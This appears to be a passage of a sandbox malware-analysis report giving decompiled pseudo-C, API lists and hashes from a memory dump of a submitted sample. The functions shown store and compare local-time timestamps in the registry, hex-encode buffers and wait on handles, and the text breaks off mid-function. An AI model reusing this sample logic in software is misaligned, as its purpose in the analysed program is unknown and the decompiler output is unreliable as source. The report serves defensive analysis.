                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                                        			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				int _v44;
                                                                                                                                                                                                                                                                                                        				int _v48;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				signed int _v68;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v72;
                                                                                                                                                                                                                                                                                                        				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                                                                                                                                                        				short* _t69;
                                                                                                                                                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t101;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 1;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v24 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                                                        					_t58 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        					_v12 = _t58;
                                                                                                                                                                                                                                                                                                        					E04007D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                                                        					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                                                        					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                                                        					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                                        					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                                                                                                                                                        					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                                                        						_v48 = 0x10;
                                                                                                                                                                                                                                                                                                        						_v44 = 0x10;
                                                                                                                                                                                                                                                                                                        						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                                                        							_v72 =  &_v64;
                                                                                                                                                                                                                                                                                                        							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                                                        							_t91 = _v72;
                                                                                                                                                                                                                                                                                                        							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                                                        							_t68 = _t101;
                                                                                                                                                                                                                                                                                                        							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                                                        							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                                                        							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                                                        							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                                                        							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                                                        							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                                                        							_t70 = E04009910();
                                                                                                                                                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                                                                                                                                                        							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                                                        							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                                                        								_v5 = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}























                                                                                                                                                                                                                                                                                                        0x04007256
                                                                                                                                                                                                                                                                                                        0x0400725e
                                                                                                                                                                                                                                                                                                        0x040073af
                                                                                                                                                                                                                                                                                                        0x040073b5
                                                                                                                                                                                                                                                                                                        0x04007285
                                                                                                                                                                                                                                                                                                        0x04007295
                                                                                                                                                                                                                                                                                                        0x04007298
                                                                                                                                                                                                                                                                                                        0x0400729d
                                                                                                                                                                                                                                                                                                        0x040072a8
                                                                                                                                                                                                                                                                                                        0x040072bd
                                                                                                                                                                                                                                                                                                        0x040072c3
                                                                                                                                                                                                                                                                                                        0x040072c6
                                                                                                                                                                                                                                                                                                        0x040072d6
                                                                                                                                                                                                                                                                                                        0x040072d8
                                                                                                                                                                                                                                                                                                        0x040072d8
                                                                                                                                                                                                                                                                                                        0x040072df
                                                                                                                                                                                                                                                                                                        0x04007301
                                                                                                                                                                                                                                                                                                        0x04007307
                                                                                                                                                                                                                                                                                                        0x0400730e
                                                                                                                                                                                                                                                                                                        0x04007331
                                                                                                                                                                                                                                                                                                        0x0400733c
                                                                                                                                                                                                                                                                                                        0x04007343
                                                                                                                                                                                                                                                                                                        0x04007349
                                                                                                                                                                                                                                                                                                        0x0400734c
                                                                                                                                                                                                                                                                                                        0x0400734f
                                                                                                                                                                                                                                                                                                        0x04007353
                                                                                                                                                                                                                                                                                                        0x04007358
                                                                                                                                                                                                                                                                                                        0x0400735e
                                                                                                                                                                                                                                                                                                        0x04007364
                                                                                                                                                                                                                                                                                                        0x0400736a
                                                                                                                                                                                                                                                                                                        0x0400736f
                                                                                                                                                                                                                                                                                                        0x04007374
                                                                                                                                                                                                                                                                                                        0x0400737a
                                                                                                                                                                                                                                                                                                        0x04007380
                                                                                                                                                                                                                                                                                                        0x04007383
                                                                                                                                                                                                                                                                                                        0x0400738b
                                                                                                                                                                                                                                                                                                        0x04007393
                                                                                                                                                                                                                                                                                                        0x0400739f
                                                                                                                                                                                                                                                                                                        0x040073a1
                                                                                                                                                                                                                                                                                                        0x040073a1
                                                                                                                                                                                                                                                                                                        0x0400739f
                                                                                                                                                                                                                                                                                                        0x040073a9
                                                                                                                                                                                                                                                                                                        0x040073a9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04007301

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 040072BD
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 04007343
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 040073A9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                                                                                                                        				char* _t26;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                                                        						_t26 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        						_v8 = _t26;
                                                                                                                                                                                                                                                                                                        						E04007D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                                                        						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                                                        						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        						if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                                                                                                                        						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                                                        						if(_t24 == 0) {
                                                                                                                                                                                                                                                                                                        							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                                                        							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                                                        							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                                                                                                                        			}











                                                                                                                                                                                                                                                                                                        0x040073ca
                                                                                                                                                                                                                                                                                                        0x040073e4
                                                                                                                                                                                                                                                                                                        0x040073eb
                                                                                                                                                                                                                                                                                                        0x04007401
                                                                                                                                                                                                                                                                                                        0x04007404
                                                                                                                                                                                                                                                                                                        0x04007409
                                                                                                                                                                                                                                                                                                        0x04007414
                                                                                                                                                                                                                                                                                                        0x04007429
                                                                                                                                                                                                                                                                                                        0x04007432
                                                                                                                                                                                                                                                                                                        0x04007442
                                                                                                                                                                                                                                                                                                        0x04007444
                                                                                                                                                                                                                                                                                                        0x04007444
                                                                                                                                                                                                                                                                                                        0x0400744b
                                                                                                                                                                                                                                                                                                        0x04007465
                                                                                                                                                                                                                                                                                                        0x0400746d
                                                                                                                                                                                                                                                                                                        0x04007473
                                                                                                                                                                                                                                                                                                        0x0400748b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04007495
                                                                                                                                                                                                                                                                                                        0x0400746d
                                                                                                                                                                                                                                                                                                        0x040073eb
                                                                                                                                                                                                                                                                                                        0x0400749e

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 04007429
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 04007473
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 04007495
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				signed char _v25;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                                        					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                                                        						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                                                        						E04007D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                                                        						E04009560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                                                        						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                                                        						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                                                        						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                                                        						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x04009656
                                                                                                                                                                                                                                                                                                        0x04009661
                                                                                                                                                                                                                                                                                                        0x04009685
                                                                                                                                                                                                                                                                                                        0x04009696
                                                                                                                                                                                                                                                                                                        0x04009699
                                                                                                                                                                                                                                                                                                        0x040096b1
                                                                                                                                                                                                                                                                                                        0x040096bc
                                                                                                                                                                                                                                                                                                        0x040096cf
                                                                                                                                                                                                                                                                                                        0x040096d4
                                                                                                                                                                                                                                                                                                        0x040096df
                                                                                                                                                                                                                                                                                                        0x040096ef
                                                                                                                                                                                                                                                                                                        0x040096f8
                                                                                                                                                                                                                                                                                                        0x040096f8
                                                                                                                                                                                                                                                                                                        0x0400970a
                                                                                                                                                                                                                                                                                                        0x04009712
                                                                                                                                                                                                                                                                                                        0x04009712
                                                                                                                                                                                                                                                                                                        0x0400971f
                                                                                                                                                                                                                                                                                                        0x0400971f
                                                                                                                                                                                                                                                                                                        0x04009728

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04009690
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 040096E9
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04009701
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04009719
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                                                                                                                                                                                        			E00416290(void* __ecx, void* __edx, char _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                                                                                                                                                        				signed int _v68;
                                                                                                                                                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                                                                                                                                                        				signed int _v80;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                                                                                                                        				signed int _t75;
                                                                                                                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                                                                                                        				char _t87;
                                                                                                                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t99;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t82 = __edx;
                                                                                                                                                                                                                                                                                                        				_t78 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t90 = _t89 - 0x3c;
                                                                                                                                                                                                                                                                                                        				_t87 = _a4;
                                                                                                                                                                                                                                                                                                        				_t101 = _a8 - 1;
                                                                                                                                                                                                                                                                                                        				_t75 = _a12;
                                                                                                                                                                                                                                                                                                        				if(_a8 == 1) {
                                                                                                                                                                                                                                                                                                        					_v72 = _t75;
                                                                                                                                                                                                                                                                                                        					 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        					_v48 = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        					_t46 = WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        					_t91 = _t90 - 8;
                                                                                                                                                                                                                                                                                                        					__eflags = WaitForSingleObject - 0x80;
                                                                                                                                                                                                                                                                                                        					if(WaitForSingleObject == 0x80) {
                                                                                                                                                                                                                                                                                                        						_t76 = 1;
                                                                                                                                                                                                                                                                                                        						goto L19;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__eflags = WaitForSingleObject - 0x102;
                                                                                                                                                                                                                                                                                                        						if(WaitForSingleObject == 0x102) {
                                                                                                                                                                                                                                                                                                        							_t76 = 0x8a;
                                                                                                                                                                                                                                                                                                        							goto L19;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							__eflags = WaitForSingleObject - 1;
                                                                                                                                                                                                                                                                                                        							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                                        							_t51 =  !_t46 & 0x00000016;
                                                                                                                                                                                                                                                                                                        							__eflags = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v36 = _t87;
                                                                                                                                                                                                                                                                                                        					 *_t90 = E00411DD0();
                                                                                                                                                                                                                                                                                                        					_t53 = E00411DF0(_t101);
                                                                                                                                                                                                                                                                                                        					_v32 = _t53;
                                                                                                                                                                                                                                                                                                        					if(_t53 == 0) {
                                                                                                                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        							_v48 = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_v72 = 0x28;
                                                                                                                                                                                                                                                                                                        								 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        								_t55 = _v48();
                                                                                                                                                                                                                                                                                                        								_t91 = _t90 - 8;
                                                                                                                                                                                                                                                                                                        								__eflags = _t55 - 0x80;
                                                                                                                                                                                                                                                                                                        								_t83 = _t55;
                                                                                                                                                                                                                                                                                                        								if(_t55 == 0x80) {
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags = _t55 - 0x102;
                                                                                                                                                                                                                                                                                                        								if(_t55 == 0x102) {
                                                                                                                                                                                                                                                                                                        									_t59 = E00412070(_t75, _t78, _t83, _t85, _t87, _t88);
                                                                                                                                                                                                                                                                                                        									__eflags = _t59;
                                                                                                                                                                                                                                                                                                        									if(_t59 == 0) {
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										goto L49;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t51 = 0;
                                                                                                                                                                                                                                                                                                        									__eflags = _t83;
                                                                                                                                                                                                                                                                                                        									_t76 = 0x16;
                                                                                                                                                                                                                                                                                                        									if(_t83 == 0) {
                                                                                                                                                                                                                                                                                                        										goto L15;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										L55:
                                                                                                                                                                                                                                                                                                        										_t56 = E00412070(_t76, _t78, _t83, _t85, _t87, _t88);
                                                                                                                                                                                                                                                                                                        										__eflags = _t56;
                                                                                                                                                                                                                                                                                                        										if(_t56 != 0) {
                                                                                                                                                                                                                                                                                                        											L49:
                                                                                                                                                                                                                                                                                                        											__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        											if(_a8 == 2) {
                                                                                                                                                                                                                                                                                                        												goto L17;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											__eflags = _t76 - 0x16;
                                                                                                                                                                                                                                                                                                        											_t51 = 0x16;
                                                                                                                                                                                                                                                                                                        											if(_t76 != 0x16) {
                                                                                                                                                                                                                                                                                                        												L19:
                                                                                                                                                                                                                                                                                                        												_v80 = 0;
                                                                                                                                                                                                                                                                                                        												 *_t91 = _t87;
                                                                                                                                                                                                                                                                                                        												_t47 = _v48();
                                                                                                                                                                                                                                                                                                        												__eflags = _t47;
                                                                                                                                                                                                                                                                                                        												if(_t47 != 0) {
                                                                                                                                                                                                                                                                                                        													goto L10;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													goto L20;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L59;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t76 = 1;
                                                                                                                                                                                                                                                                                                        							goto L55;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t86 = 0x14;
                                                                                                                                                                                                                                                                                                        							_v48 = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        							do {
